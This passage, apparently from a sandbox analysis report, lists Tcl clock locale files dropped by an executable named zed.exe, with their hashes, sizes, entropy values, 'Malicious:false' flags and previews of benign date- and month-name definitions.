                                                                                                                                                                                                                                            SHA1:C3005370DAE8A266AE21F7E2B871AEA5A656A155
                                                                                                                                                                                                                                            SHA-256:1D72170B9F9028A237364F7CD7EA8B48BD4770E61922205CE862300103B13DE5
                                                                                                                                                                                                                                            SHA-512:58B64D4F5827CA2A1BF2DDFD1F7EFDDBBD46709A6A9B7277E8EB386D80043A87ADDE2B3D5A49A934E8EB8F797BD735FADA1D22AD3DD856FFE9507F71B9E45CBA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset it DAYS_OF_WEEK_ABBREV [list \.. "dom"\.. "lun"\.. "mar"\.. "mer"\.. "gio"\.. "ven"\.. "sab"].. ::msgcat::mcset it DAYS_OF_WEEK_FULL [list \.. "domenica"\.. "luned\u00ec"\.. "marted\u00ec"\.. "mercoled\u00ec"\.. "gioved\u00ec"\.. "venerd\u00ec"\.. "sabato"].. ::msgcat::mcset it MONTHS_ABBREV [list \.. "gen"\.. "feb"\.. "mar"\.. "apr"\.. "mag"\.. "giu"\.. "lug"\.. "ago"\.. "set"\.. "ott"\.. "nov"\.. "dic"\.. ""].. ::msgcat::mcset it MONTHS_FULL [list \.. "gennaio"\.. "febbraio"\.. "marzo"\.. "aprile"\.. "maggio"\.. "giugno"\.. "luglio"\.. "agosto"\.. "settembre"\.. "ottobre"\.. "novembre"\.. "dicembre"\.. "
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):250
                                                                                                                                                                                                                                            Entropy (8bit):4.8982877714191035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoi5jL/oyJ+3v1oia+3vjLtAsvn:4EnLB383b3F+3vV3v3tnn
                                                                                                                                                                                                                                            MD5:E4400C16406A46C2880250522BED2EDE
                                                                                                                                                                                                                                            SHA1:787A04037A355FF845025B8865335EB938280BFB
                                                                                                                                                                                                                                            SHA-256:24B5F303F5C7AF6F63FDC23ADB4D713087AE74B6D18C117D787AF03374C5F57E
                                                                                                                                                                                                                                            SHA-512:3551DEEF0EAAC66042143F77F2F4DD9154764F35BD624DAB3C9F0F59F3489CA39CE34BC2A69BC5BFBB1926C6F5C39D74A806ECB1A47F6B374101071957FD417B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset it_CH DATE_FORMAT "%e. %B %Y".. ::msgcat::mcset it_CH TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset it_CH DATE_TIME_FORMAT "%e. %B %Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1689
                                                                                                                                                                                                                                            Entropy (8bit):4.951012555106795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83Gl84OCtnbf3wvtMwvLv4GTwhvevTwSoXghGhD6h:43FULWttbdEVoES8gshD6h
                                                                                                                                                                                                                                            MD5:11FBE427747012444AEEAFD6134034A4
                                                                                                                                                                                                                                            SHA1:58C72C432053264EAE6335D6CC93C5FFA33C42B8
                                                                                                                                                                                                                                            SHA-256:2B6D15A191437F1B84FA7023E34153B61E6BF1DE1452EA921E9CCBBE5D4BEB1C
                                                                                                                                                                                                                                            SHA-512:4F993BDF5D50D6D9F7410C83D226FEF30BA8C989F9977A7025C36BE22CEECCD6C68CDD6AFC5C9CE3D700559C4EDC619042E14DD88EE7583B9D5AA66F0268FD23
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ja DAYS_OF_WEEK_ABBREV [list \.. "\u65e5"\.. "\u6708"\.. "\u706b"\.. "\u6c34"\.. "\u6728"\.. "\u91d1"\.. "\u571f"].. ::msgcat::mcset ja DAYS_OF_WEEK_FULL [list \.. "\u65e5\u66dc\u65e5"\.. "\u6708\u66dc\u65e5"\.. "\u706b\u66dc\u65e5"\.. "\u6c34\u66dc\u65e5"\.. "\u6728\u66dc\u65e5"\.. "\u91d1\u66dc\u65e5"\.. "\u571f\u66dc\u65e5"].. ::msgcat::mcset ja MONTHS_FULL [list \.. "1\u6708"\.. "2\u6708"\.. "3\u6708"\.. "4\u6708"\.. "5\u6708"\.. "6\u6708"\.. "7\u6708"\.. "8\u6708"\.. "9\u6708"\.. "10\u6708"\.. "11\u6708"\.. "12\u6708"].. ::msgcat::mcset ja BCE "\u7d00\u5143\u524d".. ::msgcat::mcset ja CE "\u897f\u66a6".. ::msgcat::mcset ja AM "\u5348\u524d".. ::msgcat::mcset ja PM "\u5348\u5f8c".. ::ms
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1025
                                                                                                                                                                                                                                            Entropy (8bit):4.097746630492712
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83E7XIE/OWbjH3Tw2PzJrIsmZ5maAXaMHPB:43WlrraA/vB
                                                                                                                                                                                                                                            MD5:2F79804667D6F8C77BB188D59EF5F3DF
                                                                                                                                                                                                                                            SHA1:10950ECA798F24A7C405B3E18B559CCC0C056EC1
                                                                                                                                                                                                                                            SHA-256:96FF17F1CFF976E4E204D3616D1EFCED4D0F907C5E6A0F04B4536CB4AD1190C9
                                                                                                                                                                                                                                            SHA-512:1B8ADC3B7FF920F8F53A17BFCC7EA24A0F8E276A42E5C63F9880DAE9B74E12716DD12DB647A80A9D99294449146C643EC58A33B03681AA4FA26A5FBC508C248C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kl DAYS_OF_WEEK_ABBREV [list \.. "sab"\.. "ata"\.. "mar"\.. "pin"\.. "sis"\.. "tal"\.. "arf"].. ::msgcat::mcset kl DAYS_OF_WEEK_FULL [list \.. "sabaat"\.. "ataasinngorneq"\.. "marlunngorneq"\.. "pingasunngorneq"\.. "sisamanngorneq"\.. "tallimanngorneq"\.. "arfininngorneq"].. ::msgcat::mcset kl MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset kl MONTHS_FULL [list \.. "januari"\.. "februari"\.. "martsi"\.. "aprili"\.. "maji"\.. "juni"\.. "juli"\.. "augustusi"\.. "septemberi"\.. "oktoberi"\.. "novemberi"\.. "dece
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.882476709336307
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoEpb53FuoEpLE3vLjoEpLE3v6mjoEpba+3vnFDoAkvn:4EnLB383jF3Fyw3vxw3v6A/3v9dmn
                                                                                                                                                                                                                                            MD5:255830678C8724E65C05A7E020E68B5B
                                                                                                                                                                                                                                            SHA1:0AEA48AB0439C04F92B5CA9A3B5182718B7F116B
                                                                                                                                                                                                                                            SHA-256:3027CFE9EBD2172CEFC15C025786CAD47A6E2894BF0474AFC1B0C341E70202AA
                                                                                                                                                                                                                                            SHA-512:99039FFA7269DD136D1693121E261DB5586E86EC401D2B1EB8FB1D13A9A7F1E514D9FC941B838286B986C02ED281828ED67E59002D837E350A64F4832340516A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kl_GL DATE_FORMAT "%d %b %Y".. ::msgcat::mcset kl_GL TIME_FORMAT "%T".. ::msgcat::mcset kl_GL TIME_FORMAT_12 "%T".. ::msgcat::mcset kl_GL DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1621
                                                                                                                                                                                                                                            Entropy (8bit):4.612163420716489
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:43fMlylslXlslxl1hVuqLGuqqntH4xUyw9:2fKYqVq3f
                                                                                                                                                                                                                                            MD5:CCB2C2254D3FA3025183DB7E010CAD66
                                                                                                                                                                                                                                            SHA1:510BBB6A9162F2EF908E6561CC714848C2EA74CA
                                                                                                                                                                                                                                            SHA-256:EF6FB319C398EEA79B3A951319F831F3B186D556565D17D738E5F9B4B77570F2
                                                                                                                                                                                                                                            SHA-512:A0264565899BD1B0783ADC0388F893CCE713ADB23BDD63907CF092A74ACB4F7D3BE09DA29801E9C11A7B08CB1706E3771C598ACED351A0FCCBF4EBBD7871148D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ko DAYS_OF_WEEK_ABBREV [list \.. "\uc77c"\.. "\uc6d4"\.. "\ud654"\.. "\uc218"\.. "\ubaa9"\.. "\uae08"\.. "\ud1a0"].. ::msgcat::mcset ko DAYS_OF_WEEK_FULL [list \.. "\uc77c\uc694\uc77c"\.. "\uc6d4\uc694\uc77c"\.. "\ud654\uc694\uc77c"\.. "\uc218\uc694\uc77c"\.. "\ubaa9\uc694\uc77c"\.. "\uae08\uc694\uc77c"\.. "\ud1a0\uc694\uc77c"].. ::msgcat::mcset ko MONTHS_ABBREV [list \.. "1\uc6d4"\.. "2\uc6d4"\.. "3\uc6d4"\.. "4\uc6d4"\.. "5\uc6d4"\.. "6\uc6d4"\.. "7\uc6d4"\.. "8\uc6d4"\.. "9\uc6d4"\.. "10\uc6d4"\.. "11\uc6d4"\.. "12\uc6d4"\.. ""].. ::msgcat::mcset ko MONTHS_FULL [list \.. "1\uc6d4"\.. "2\uc6d4"\.. "3\uc6d4"\.. "4\uc6d4"\.. "5\uc6d4"\.. "6\uc6d4"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                                                                                            Entropy (8bit):5.058233326545794
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo56SFZhjAo56m5Ys5o56TGMovBo56a/W3v6mfKo56TT+3+:4EnLB383g62vjV6m5Ysg6TG26a+3v6oo
                                                                                                                                                                                                                                            MD5:58CA45CE26AF8ECA729BA72898BB633D
                                                                                                                                                                                                                                            SHA1:CBBEDB7370890A1DB65080A359A9A5C164B525D5
                                                                                                                                                                                                                                            SHA-256:4CAC8FB43D290A63A4D3215F22228B358AB4FA174F08712DD6C5B64C5E485071
                                                                                                                                                                                                                                            SHA-512:48CCBD3F7B96D0998B6D1A1F8D7FE2B4B070BB5B8809FABE0A38209AEAF2E95E098292A5B9B5F0954E7729708A2173D32AAD70B6C0F336DB1E9BFA2968E6A56B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ko_KR BCE "\uae30\uc6d0\uc804".. ::msgcat::mcset ko_KR CE "\uc11c\uae30".. ::msgcat::mcset ko_KR DATE_FORMAT "%Y.%m.%d".. ::msgcat::mcset ko_KR TIME_FORMAT_12 "%P %l:%M:%S".. ::msgcat::mcset ko_KR DATE_TIME_FORMAT "%Y.%m.%d %P %l:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1997
                                                                                                                                                                                                                                            Entropy (8bit):4.202940482570495
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83cm48Vc7VczMmDNVcYVcR0prdSmS68FeDJVcYVcR0prdSmS68FeuT:4354a+0prjS68mq0prjS68pT
                                                                                                                                                                                                                                            MD5:67FA08F588A3B44D67E42EC1025013BC
                                                                                                                                                                                                                                            SHA1:6895FEF0476DE0349895DB052B335AC46636B23A
                                                                                                                                                                                                                                            SHA-256:9D215E31A39FED45B3657144E5F73C942E59E500036CE16B1FFF201FD6358595
                                                                                                                                                                                                                                            SHA-512:4C2708BD9DD98320D3133EEFFD19A8018F49A36AB8348DB7C0B0287ADB4C052D3EFAD3686C8E46E0520F3CE27F361978272BA8752EB04E5A7BC07780398480DB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kok DAYS_OF_WEEK_FULL [list \.. "\u0906\u0926\u093f\u0924\u094d\u092f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u093e\u0930"\.. "\u092c\u0941\u0927\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset kok MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):260
                                                                                                                                                                                                                                            Entropy (8bit):4.904340548436718
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo5VsNv+IZo5VsU3v6ry/5o5VsNo+3v+6f6HyFvn:4EnLB383gVsNvlAVsU3v6ry/gVsNF3vj
                                                                                                                                                                                                                                            MD5:0AA20289A63BA3A14DCFED75EED980DE
                                                                                                                                                                                                                                            SHA1:2B76013593D886B0724D82849FD1840B20922902
                                                                                                                                                                                                                                            SHA-256:644F2B6D4BA27AF14891B781DEF60F708A9F18FC2F73566649B631A6DEA3EF09
                                                                                                                                                                                                                                            SHA-512:6E13E0DC8BFD2ABE0D04B0BC098C40972F088F8D3D6ACA00338B17473ABC6F69840A88EC0C965C493B4270DEC777A0EA2D762BC33044EFE7030E437604EE201B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kok_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset kok_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset kok_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1013
                                                                                                                                                                                                                                            Entropy (8bit):4.060027087416375
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83no1UwRlw4MAwBdc//3rpF6HFoot8:43vglHM7MTCHFs
                                                                                                                                                                                                                                            MD5:CCEC7B77DCA1F6A406311FC43EE57030
                                                                                                                                                                                                                                            SHA1:4ED329BB09A8F7C67F8984CD790E9B6819DE6F00
                                                                                                                                                                                                                                            SHA-256:EAB468AC5BF1833D4F8CD658789413D4A46CAD16B63FB9B906CFF6DC9EA26251
                                                                                                                                                                                                                                            SHA-512:4EFF6E49CC479A1BF0CEEAE256A1FAE7D4AE7D0ACE23CD87851471EC96BB5AF580C58A142E1B6CE72BC8B6BFF946A38801E681443B7DD9527A1DEB6E7EDD7D22
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kw DAYS_OF_WEEK_ABBREV [list \.. "Sul"\.. "Lun"\.. "Mth"\.. "Mhr"\.. "Yow"\.. "Gwe"\.. "Sad"].. ::msgcat::mcset kw DAYS_OF_WEEK_FULL [list \.. "De Sul"\.. "De Lun"\.. "De Merth"\.. "De Merher"\.. "De Yow"\.. "De Gwener"\.. "De Sadorn"].. ::msgcat::mcset kw MONTHS_ABBREV [list \.. "Gen"\.. "Whe"\.. "Mer"\.. "Ebr"\.. "Me"\.. "Evn"\.. "Gor"\.. "Est"\.. "Gwn"\.. "Hed"\.. "Du"\.. "Kev"\.. ""].. ::msgcat::mcset kw MONTHS_FULL [list \.. "Mys Genver"\.. "Mys Whevrel"\.. "Mys Merth"\.. "Mys Ebrel"\.. "Mys Me"\.. "Mys Evan"\.. "Mys Gortheren"\.. "Mye Est"\.. "Mys Gwyngala"\.. "Mys Hedra"\.. "Mys Du"\.. "Mys Kevardhu"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.959913054070712
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoh6AvMoh633v6ay/5oh6Ao+3vR6HyFvn:4EnLB38346AvR633v6ay/46AF3voSVn
                                                                                                                                                                                                                                            MD5:18E8576F63B978F1AFEF15AC57B44FBF
                                                                                                                                                                                                                                            SHA1:D50EB90944FF81E3CBFF942B16C1874EB7EA2562
                                                                                                                                                                                                                                            SHA-256:EDAC14D929D1C6559EC46E9B460F8F44A189B78FB915F2D641104549CBD94188
                                                                                                                                                                                                                                            SHA-512:F3DE5EE77BB889DA1353F9C9A1811083AB28BBEE4B7D6C8782F38B1AE44CF77565371A0E18F7E2BACD7EF590BC1215CA3E41AF929A15F60B3E85F6099A4CF378
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset kw_GB DATE_FORMAT "%d %B %Y".. ::msgcat::mcset kw_GB TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset kw_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1307
                                                                                                                                                                                                                                            Entropy (8bit):4.506235846178408
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83iHYuAMLzHYCaNu3d3nT15T31FhAlDgK/YrDZ/6Qz2C9kGPCveksvc:43iHFnHuUd3/T3xM/+SQCC9kGPEekKc
                                                                                                                                                                                                                                            MD5:D4EC2E96995E0EB263F338DD16CC4F8D
                                                                                                                                                                                                                                            SHA1:7ED86175489B1AE3CA5C0E8D42969F951C895D6B
                                                                                                                                                                                                                                            SHA-256:855B652FCC8066BA45C7DC8DBFD3807D1B4759EA8D71C523567F47BF445D1DE6
                                                                                                                                                                                                                                            SHA-512:A55E0D759A22360FF6668CEFAFFB812BABB316C447ADDB1FD5CDBC06AE1DA2E891E09952D073164C013AD9BF4184614102E7ADA553EEEFB2BBA26208B79B277F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lt DAYS_OF_WEEK_ABBREV [list \.. "Sk"\.. "Pr"\.. "An"\.. "Tr"\.. "Kt"\.. "Pn"\.. "\u0160t"].. ::msgcat::mcset lt DAYS_OF_WEEK_FULL [list \.. "Sekmadienis"\.. "Pirmadienis"\.. "Antradienis"\.. "Tre\u010diadienis"\.. "Ketvirtadienis"\.. "Penktadienis"\.. "\u0160e\u0161tadienis"].. ::msgcat::mcset lt MONTHS_ABBREV [list \.. "Sau"\.. "Vas"\.. "Kov"\.. "Bal"\.. "Geg"\.. "Bir"\.. "Lie"\.. "Rgp"\.. "Rgs"\.. "Spa"\.. "Lap"\.. "Grd"\.. ""].. ::msgcat::mcset lt MONTHS_FULL [list \.. "Sausio"\.. "Vasario"\.. "Kovo"\.. "Baland\u017eio"\.. "Gegu\u017e\u0117s"\.. "Bir\u017eelio"\.. "Liepos"\.. "Rugpj\u016b\u010dio"\.. "Rugs\u0117jo"\.. "Spa
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1271
                                                                                                                                                                                                                                            Entropy (8bit):4.460631492946299
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83Amshb4mZdA7nl9kMmfpK269rkbi5vWm0W9ARivirXsv05vkn:430bHA7XRr95QWQQgaKkn
                                                                                                                                                                                                                                            MD5:554ED2CAFD25F5F82DA54AE057F4BA98
                                                                                                                                                                                                                                            SHA1:E25CDF0F9C4B523B5B05408E7820F7B4F627D19E
                                                                                                                                                                                                                                            SHA-256:7E90D2008B220DB19C796C7107AD69D263B8AC8C7BDDFB879230699D978E9A0A
                                                                                                                                                                                                                                            SHA-512:612201CCD64A51EC943921196D8C74D8BCA3AB3E35B0C9E91AE7F3A6B36F4F255AA9ADB3A254EC03629B01BD221B0B3F8CC4DFBFAC1F1718775E81CAD188AA86
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset lv DAYS_OF_WEEK_ABBREV [list \.. "Sv"\.. "P"\.. "O"\.. "T"\.. "C"\.. "Pk"\.. "S"].. ::msgcat::mcset lv DAYS_OF_WEEK_FULL [list \.. "sv\u0113tdiena"\.. "pirmdiena"\.. "otrdiena"\.. "tre\u0161diena"\.. "ceturdien"\.. "piektdiena"\.. "sestdiena"].. ::msgcat::mcset lv MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Maijs"\.. "J\u016bn"\.. "J\u016bl"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dec"\.. ""].. ::msgcat::mcset lv MONTHS_FULL [list \.. "janv\u0101ris"\.. "febru\u0101ris"\.. "marts"\.. "apr\u012blis"\.. "maijs"\.. "j\u016bnijs"\.. "j\u016blijs"\.. "augusts"\.. "septembris"\.. "oktobris"\.. "novembris"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2157
                                                                                                                                                                                                                                            Entropy (8bit):4.299300188052441
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:4389QMsGqdQfRQPjQmofqJp9sk5BstSpWQiQ3QJQ5QL39I0QRQTQ8Ql4J8W:2W8SMq+9sWINi2Kc9I0+gXF
                                                                                                                                                                                                                                            MD5:888014F13A82511ABEF99497A753BFC3
                                                                                                                                                                                                                                            SHA1:7F4231BEDE191370B37E8B917B6AD8829D15CA7D
                                                                                                                                                                                                                                            SHA-256:4C0EB07F0FCB36DD12A3F7EDD6531616611ABF62BF7705B5A37CC59098221D5D
                                                                                                                                                                                                                                            SHA-512:D748127CC615584901D35B6492EC566448B6C4DA6363858B5145921E9CD09490355CF4315F0F7A8542AA12790CD3432011A643A3A8F74B0119DB0DCE19FD68A4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0435\u0434."\.. "\u043f\u043e\u043d."\.. "\u0432\u0442."\.. "\u0441\u0440\u0435."\.. "\u0447\u0435\u0442."\.. "\u043f\u0435\u0442."\.. "\u0441\u0430\u0431."].. ::msgcat::mcset mk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0435\u043b\u0430"\.. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\.. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\.. "\u0441\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0440\u0442\u043e\u043a"\.. "\u043f\u0435\u0442\u043e\u043a"\.. "\u0441\u0430\u0431\u043e\u0442\u0430"].. ::msgcat::mcset mk MONTHS_ABBREV [list \.. "\u0458\u0430\u043d."\.. "\u0444\u0435\u0432."\.. "\u043c\u0430\u0440."\.. "\u0430\u043f\u0440."\.. "\u043c\u0430\u0458."\.. "\u0458\u0443\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1846
                                                                                                                                                                                                                                            Entropy (8bit):4.220147808639664
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR833cXh48Vc7VczfVczPmzNVcYVcR0prdSmS68FezUVcYVcR0prdSmS68FeoV:43K4S+0prjS68Yh0prjS68nV
                                                                                                                                                                                                                                            MD5:07F99E0A05083B10F80A4D6867163B23
                                                                                                                                                                                                                                            SHA1:B6036C7DA8043E3401583D03831E7A4BF755D93D
                                                                                                                                                                                                                                            SHA-256:AE873BF5484EACBBE179913D43451BE53378FA701B5D81594D052266B8A09AF0
                                                                                                                                                                                                                                            SHA-512:3A032C81B8FBFEE6EB66C1538CBD16329A1B393E4684B4E9B3FBCDD6344CE8AD34FA699F76EF953B3EB597D8E253345F54C2E92E7A43611C721038BCC2471EA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset mr DAYS_OF_WEEK_FULL [list \.. "\u0930\u0935\u093f\u0935\u093e\u0930"\.. "\u0938\u094b\u092e\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\.. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\.. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\.. "\u0936\u0928\u093f\u0935\u093e\u0930"].. ::msgcat::mcset mr MONTHS_ABBREV [list \.. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\.. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\.. "\u092e\u093e\u0930\u094d\u091a"\.. "\u090f\u092a\u094d\u0930\u093f\u0932"\.. "\u092e\u0947"\.. "\u091c\u0942\u0928"\.. "\u091c\u0941\u0932\u0948"\.. "\u0913\u0917\u0938\u094d\u091f"\.. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\.. "\u0913\u0915\u094d\u091f\u0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.89440333975705
                                                                                                                                                                                                                                            Encrypted:false
